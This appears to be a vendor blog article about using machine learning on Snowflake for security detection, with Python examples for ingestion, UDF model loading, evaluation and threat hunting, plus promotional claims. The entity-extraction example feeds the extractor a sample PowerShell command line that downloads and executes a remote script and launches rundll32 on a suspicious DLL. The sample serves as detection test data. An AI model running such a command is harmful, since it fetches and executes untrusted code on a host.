Leveraging AI to Manage Data Cybersecurity Workloads on Snowflake

The content in this article is part of Episode 8 of the Detection Engineering Dispatch series, presented by Mike Hart, Principal Data Scientist at Anvilogic.

Managing big data systems means handling diverse data sources that produce millions of events, all of which need monitoring for potential cybersecurity threats.

Data cloud platforms like Snowflake offer scalable, cost-effective storage, seamless data sharing, and powerful compute, so security operations teams can manage their data in a single platform that functions like a security data lake. However, the true potential of a data lake for security operations is unlocked when it is combined with AI, which can support and educate security teams in ways that would not have been possible or scalable with a traditional SIEM.

Anvilogic works as a multi-data platform SIEM across Splunk and Snowflake, giving security operations teams the freedom to adopt a scalable security data lake without ripping and replacing their existing security investments. By leveraging AI alongside Snowflake, Anvilogic helps you process, analyze, and draw insights from cybersecurity workloads for more scalable and cost-effective detection and response. A SOC co-pilot replaces traditional data analysis methods and applies advanced machine learning techniques to refine data processing, so end users spend less time on mundane, repetitive tasks.

To get a better idea of how it works, read this guide. 

Using Your Security Data Lake

Integrating your security data lake into a seamless architecture using Anvilogic’s SOC co-pilot reduces costs, speeds up detection, and improves security coverage. 

When you integrate your data lake, the SOC co-pilot processes detections through machine learning after their initial identification. This lets you scale large data workloads efficiently while AI filters out extraneous noise.

A practical way to demonstrate this is to use large language models running on Snowflake, such as Anvilogic’s MonteAI chatbot, to drive complex investigations like identifying malicious PowerShell scripts.

This strategy mitigates the pitfalls of manual detection engineering, which often depends on individual personnel working across disjointed platforms and therefore tends to produce slow, poorly correlated processes.

Decoupling the analytics and logging layers allows you to move away from expensive, monolithic SIEMs while deploying detections easily across various data platforms – effectively democratizing the detection process across all your data lakes. 

Integration through APIs from various vendors further streamlines this process and normalizes detections without specialized coding or tool expertise. 

Now that you know the benefits of integrating security data lakes with a SOC co-pilot, here’s a comparison between the AI approach and the traditional way of managing data workloads:

Decoupling Security Analytics from Logging Platforms

Adopting a decoupled architecture allows you to build out detections while keeping your data within its native environment. Here, you can use your specific data lake's inherent mechanisms to generate detections. 

Let’s say you’re using an object store like Amazon S3 to store your security data and detections. You can then use a tool like Snowpipe, Snowflake's data ingestion service, to load these detections into event tables within Snowflake.
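As a rough illustration of that loading step, the sketch below builds the kind of `CREATE PIPE ... AS COPY INTO ...` statement Snowpipe is configured with. The pipe, table, and stage names are hypothetical placeholders. It also assumes that an external stage over the S3 bucket already exists, that detections arrive as JSON files, and that the target table has a single VARIANT column.

```python
import re

# Plain or dot-qualified identifiers only (for example db.schema.table).
_IDENTIFIER = re.compile(r"^[A-Za-z_][A-Za-z0-9_$]*(\.[A-Za-z_][A-Za-z0-9_$]*){0,2}$")


def build_snowpipe_ddl(pipe: str, table: str, stage: str) -> str:
    """Return a CREATE PIPE statement that copies JSON files from a stage.

    All three names are hypothetical; the external stage over the S3 bucket
    is assumed to exist, and the table is assumed to hold one VARIANT column.
    """
    for name in (pipe, table, stage):
        # The names are interpolated into SQL, so reject anything unusual.
        if not _IDENTIFIER.match(name):
            raise ValueError(f"unsafe identifier: {name!r}")
    return (
        f"CREATE PIPE IF NOT EXISTS {pipe}\n"
        f"  AUTO_INGEST = TRUE\n"
        f"  AS COPY INTO {table}\n"
        f"  FROM @{stage}\n"
        f"  FILE_FORMAT = (TYPE = 'JSON')"
    )


ddl = build_snowpipe_ddl(
    pipe="detections_pipe",
    table="security.detections_raw",
    stage="detections_s3_stage",
)
print(ddl)
```

The resulting statement would be run once in Snowflake; with auto-ingest enabled, new files landing in the bucket are then loaded without a scheduled job.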

Once the data is in Snowflake, the process simplifies: you have a single platform for running your ML models. You no longer have to juggle multiple data platforms or manage different vendor systems, and all relevant events from across your data lakes sit in one place for correlation and remediation.

This approach simplifies data management and improves your ability to integrate data from various sources like CrowdStrike, Wiz, or Azure Sentinel. Creating integrations within Snowflake allows you to run your models effectively and have a clear vantage point to generate insights. 
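To make the idea of correlating events from several sources concrete, here is a minimal sketch that maps records from two sources onto one shared schema and groups them by host. The source labels (`edr`, `cloud`) and every field name are invented for illustration; they are not the actual schemas of CrowdStrike, Wiz, or any other vendor.

```python
from collections import defaultdict

# Hypothetical mappings: shared field name -> field name used by the source.
FIELD_MAPS = {
    "edr": {"host": "hostname", "severity": "sev", "title": "detect_name"},
    "cloud": {"host": "resource", "severity": "level", "title": "issue"},
}


def normalize(source: str, record: dict) -> dict:
    """Map a source-specific record onto the shared schema."""
    mapping = FIELD_MAPS[source]
    row = {common: record.get(field) for common, field in mapping.items()}
    row["source"] = source
    return row


def correlate_by_host(rows: list) -> dict:
    """Group normalized rows by host so related events sit together."""
    grouped = defaultdict(list)
    for row in rows:
        grouped[row["host"]].append(row)
    return dict(grouped)


events = [
    normalize("edr", {"hostname": "web-01", "sev": "high", "detect_name": "Suspicious PowerShell"}),
    normalize("cloud", {"resource": "web-01", "level": "medium", "issue": "Public storage bucket"}),
    normalize("edr", {"hostname": "db-02", "sev": "low", "detect_name": "Unsigned binary"}),
]
by_host = correlate_by_host(events)
print({host: [e["source"] for e in evts] for host, evts in by_host.items()})
```

In practice this mapping would more likely live in SQL views or a transformation layer inside Snowflake; the Python version only shows the shape of the normalization.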

Based on the insights gathered, you can move straight from this unified platform into further actions such as triage, threat hunting, and detection.

Machine Learning for Threat Detection and Engineering

You'll face particular challenges when applying machine learning to threat detection and response. 

One primary challenge is scaling, which requires diverse approaches such as supervised and unsupervised learning and natural language processing. These techniques help normalize and extract relevant data, which is crucial in a field where attacks often manifest as anomalies amid benign events.

Understanding the attacker's persona helps you build better AI systems for spotting security threats, and so does integrating your detection team’s feedback. Rapidly deploying these insights back into the system keeps you ahead of evolving threats.

Be aware that false positives are a concern: your goal is to minimize alert fatigue. Ensure the models effectively serve as co-pilots, leading you to the most significant alerts.

Snowflake streamlines MLOps pipeline management. It simplifies the detection process from repository management (e.g., Bitbucket, GitHub) to running ML pipelines. It also handles large-scale data sets, using MapReduce-style processing for effective ETL.

Snowflake's flexibility in handling various libraries and its UI capabilities also make it an excellent choice for presenting results. It helps partners like your threat research team run ad hoc queries easily and quickly.

Now that you know how to tackle challenges in threat detection using machine learning, consider how to practically apply machine learning with user-defined functions (UDFs) in Snowflake. 

Encapsulating ML Inference in User-Defined Functions

For diverse cybersecurity challenges, you can apply machine learning inference in user-defined functions (UDFs). Specific problems require specific libraries. For example, XGBoost excels in classification tasks, while TensorFlow or PyTorch enable deep learning and language modeling. 

Encapsulating these libraries in Snowflake UDFs, or using the newer Snowpark ML Ops capabilities, streamlines unit testing and lets you reuse model loaders. It keeps models in Snowflake's file system and avoids both dependency management issues and per-task customization.

It also lets you use smaller instances, saving costs without affecting model performance. You can choose different libraries and register the UDFs in Snowflake to monitor their performance. This helps ensure that your machine learning models produce high-quality, actionable alerts.
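The loader-reuse pattern described above can be sketched in plain Python. This is only an illustration: `ThresholdModel` is a toy stand-in for a real model such as an XGBoost classifier, the model file is a temporary JSON file rather than a staged artifact, and all names are hypothetical. In Snowflake, the handler would be registered as a Python UDF (for example through Snowpark's `session.udf.register`) with the model file supplied as an import, which is not shown here because it needs a live session.

```python
import functools
import json
import os
import tempfile

# Instrumentation only, to show that the loader runs once.
LOAD_STATS = {"loads": 0}


class ThresholdModel:
    """Toy stand-in for a real model (for example an XGBoost classifier)."""

    def __init__(self, threshold: float):
        self.threshold = threshold

    def predict(self, score: float) -> int:
        return int(score >= self.threshold)


@functools.lru_cache(maxsize=None)
def load_model(path: str) -> ThresholdModel:
    """Read the model file once per process and reuse the object afterwards."""
    LOAD_STATS["loads"] += 1
    with open(path, "r", encoding="utf-8") as fh:
        params = json.load(fh)
    return ThresholdModel(params["threshold"])


def make_handler(model_path: str):
    """Build the function that would serve as the UDF body."""
    def handler(score: float) -> int:
        return load_model(model_path).predict(score)
    return handler


# Simulate a staged model file with a temporary file.
with tempfile.NamedTemporaryFile("w", suffix=".json", delete=False) as tmp:
    json.dump({"threshold": 0.8}, tmp)
    MODEL_PATH = tmp.name

is_malicious = make_handler(MODEL_PATH)
results = [is_malicious(s) for s in (0.10, 0.85, 0.95)]
print(results, "loads:", LOAD_STATS["loads"])
os.remove(MODEL_PATH)
```

Because the loader is cached, the handler can be unit tested locally with a small fixture file, and the same loader can be shared by several handlers that use the same model.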

To evaluate your machine learning models and ensure they generate high-fidelity alerts, here’s what you should do:

  • Start with a dataset that accurately represents the intended threats. 
  • Balance true positives with acceptable false positive rates. 
  • Use internal review feedback to refine models before customer deployment. 
  • Monitor regularly to catch and address data drift. 
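
Two of the steps above lend themselves to a small worked example: balancing true positives against a false positive budget, and checking for drift. The sketch below picks the lowest alert threshold whose false positive rate stays within a budget, then compares two score samples with a population stability index (PSI). The scores, labels, budget, and bin count are made-up illustration values, and PSI is one common drift measure chosen here as an assumption, not a method named in the talk.

```python
import math


def confusion_at(scores, labels, threshold):
    """Count TP, FP, TN, FN when alerting on score >= threshold."""
    tp = fp = tn = fn = 0
    for score, label in zip(scores, labels):
        alert = score >= threshold
        if alert and label:
            tp += 1
        elif alert:
            fp += 1
        elif label:
            fn += 1
        else:
            tn += 1
    return tp, fp, tn, fn


def pick_threshold(scores, labels, max_fpr):
    """Return (threshold, fpr, recall) for the lowest threshold within budget.

    The false positive rate never rises as the threshold increases, so the
    lowest qualifying threshold keeps recall as high as the budget allows.
    """
    for threshold in sorted(set(scores)):
        tp, fp, tn, fn = confusion_at(scores, labels, threshold)
        fpr = fp / (fp + tn) if (fp + tn) else 0.0
        if fpr <= max_fpr:
            recall = tp / (tp + fn) if (tp + fn) else 0.0
            return threshold, fpr, recall
    return None


def population_stability_index(baseline, current, bins=4):
    """PSI between two samples of scores in [0, 1]; larger means more drift."""
    def shares(values):
        counts = [0] * bins
        for v in values:
            counts[min(int(v * bins), bins - 1)] += 1
        # A small floor avoids log(0) for empty bins.
        return [max(c / len(values), 1e-6) for c in counts]

    b, c = shares(baseline), shares(current)
    return sum((ci - bi) * math.log(ci / bi) for bi, ci in zip(b, c))


# Made-up validation scores and labels (1 = true threat).
scores = [0.05, 0.10, 0.20, 0.35, 0.60, 0.70, 0.85, 0.95]
labels = [0, 0, 0, 0, 1, 0, 1, 1]
threshold, fpr, recall = pick_threshold(scores, labels, max_fpr=0.2)
print(f"threshold={threshold} fpr={fpr:.2f} recall={recall:.2f}")

# Made-up later sample whose scores have shifted upward.
drifted = [0.40, 0.45, 0.55, 0.65, 0.90, 0.95, 0.97, 0.99]
print(f"psi={population_stability_index(scores, drifted):.3f}")
```

A rising PSI on fresh data is a signal to re-check the threshold and, if needed, retrain on a more representative dataset.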

Leveraging AI for Threat Hunting to Scale Large Data Workloads

To hunt threats, you extract various entities from the detections, such as IPs, domains, URLs, executables, and command-line arguments. This is essential, especially when data from your data lakes isn't fully parsed. Sometimes crucial information within the process field might be overlooked, as can happen with specific Windows security event logs.
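As a minimal sketch of this kind of entity extraction, the example below pulls URLs, IPv4 addresses, and executable names out of an unparsed process field with regular expressions. The patterns are deliberately simple and would miss many real-world cases (IPv6, obfuscated commands, other file types). The sample command line is invented and uses documentation-range IP addresses.

```python
import re

URL = re.compile(r"https?://[^\s'\"<>]+", re.IGNORECASE)
IPV4 = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")
EXECUTABLE = re.compile(r"[\w.-]+\.(?:exe|dll|ps1|bat)\b", re.IGNORECASE)


def extract_entities(raw: str) -> dict:
    """Extract URLs, IPs, and executable names from an unparsed field."""
    urls = URL.findall(raw)
    # Blank out URLs first so their hosts and paths are not counted twice.
    text = URL.sub(" ", raw)
    ips = [
        ip for ip in IPV4.findall(text)
        if all(int(part) <= 255 for part in ip.split("."))
    ]
    return {"urls": urls, "ips": ips, "executables": EXECUTABLE.findall(text)}


# Invented example of a raw process field.
raw_process = (
    r"powershell.exe -nop -w hidden -c IEX(New-Object Net.WebClient)"
    r".DownloadString('http://203.0.113.7/a.ps1'); "
    r"rundll32.exe C:\Users\Public\evil.dll,Start 198.51.100.23"
)
entities = extract_entities(raw_process)
print(entities)
```

The extracted entities can then be passed to downstream models or enrichment lookups instead of the raw string.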

To address this, use text classification with LLMs to identify malicious URLs and employ deep neural networks (DNNs) to detect malicious PowerShell activities.

Deep anomaly detection techniques also come into play for spotting unusual rundll32 executions and scheduled tasks. Beyond these advanced methods, expert rules based on simple 'if-then' statements are applied to domain and IP metadata.

This approach is effective, especially when tracking traffic that originates from or is directed to regions known for lax regulations and frequent cyber attacks. These models, combined with your expert rules, form the foundation of your threat-hunting strategy.
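The expert rules described above can be as simple as the following sketch. The country codes are placeholders, and the domain-age rule and the way rule hits are combined with a model score are illustrative assumptions rather than anything specified in the talk; the real lists and thresholds would come from your threat research team.

```python
from dataclasses import dataclass

# Placeholder codes; a real list would come from your threat research team.
HIGH_RISK_COUNTRIES = frozenset({"XX", "YY"})


@dataclass(frozen=True)
class ConnectionMeta:
    """Hypothetical metadata for one network connection."""
    src_country: str
    dst_country: str
    domain_age_days: int


def rule_hits(meta: ConnectionMeta, new_domain_days: int = 30) -> list:
    """Apply simple if-then rules and return the names of the rules that fired."""
    hits = []
    if meta.src_country in HIGH_RISK_COUNTRIES:
        hits.append("traffic_from_high_risk_region")
    if meta.dst_country in HIGH_RISK_COUNTRIES:
        hits.append("traffic_to_high_risk_region")
    # Assumed extra rule: very young domains are treated as suspicious.
    if meta.domain_age_days < new_domain_days:
        hits.append("newly_registered_domain")
    return hits


def should_escalate(model_score: float, hits: list) -> bool:
    """Illustrative policy: a strong score alone, or a moderate score plus a rule hit."""
    return model_score >= 0.9 or (model_score >= 0.5 and bool(hits))


benign = ConnectionMeta(src_country="AA", dst_country="BB", domain_age_days=900)
suspicious = ConnectionMeta(src_country="AA", dst_country="XX", domain_age_days=3)

print(rule_hits(benign), should_escalate(0.6, rule_hits(benign)))
print(rule_hits(suspicious), should_escalate(0.6, rule_hits(suspicious)))
```

Keeping the rules as named checks makes it easy to report which rule fired alongside the model score when an alert reaches an analyst.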

Break Free From SIEM Lock-In and Save Up to 80% on Costs With Anvilogic

Security operations teams struggle to detect high-risk threats in their environment while managing spiraling SIEM costs. Vendor lock-in prevents them from adopting more scalable security data lakes like Snowflake that could address both of these challenges. Anvilogic is trailblazing the solution to this challenge with our multi-data platform SIEM that works across your Splunk, Snowflake and Azure data platforms. This gives security teams the freedom to choose the best data platform for their security use cases without the need to rip and replace their existing security investments.

Book a personalized demo today to learn how Anvilogic can help you cut SIEM costs without a rip-and-replace, reduce risk by closing detection gaps across Splunk and Snowflake, and adopt a SOC co-pilot that works across your data platforms.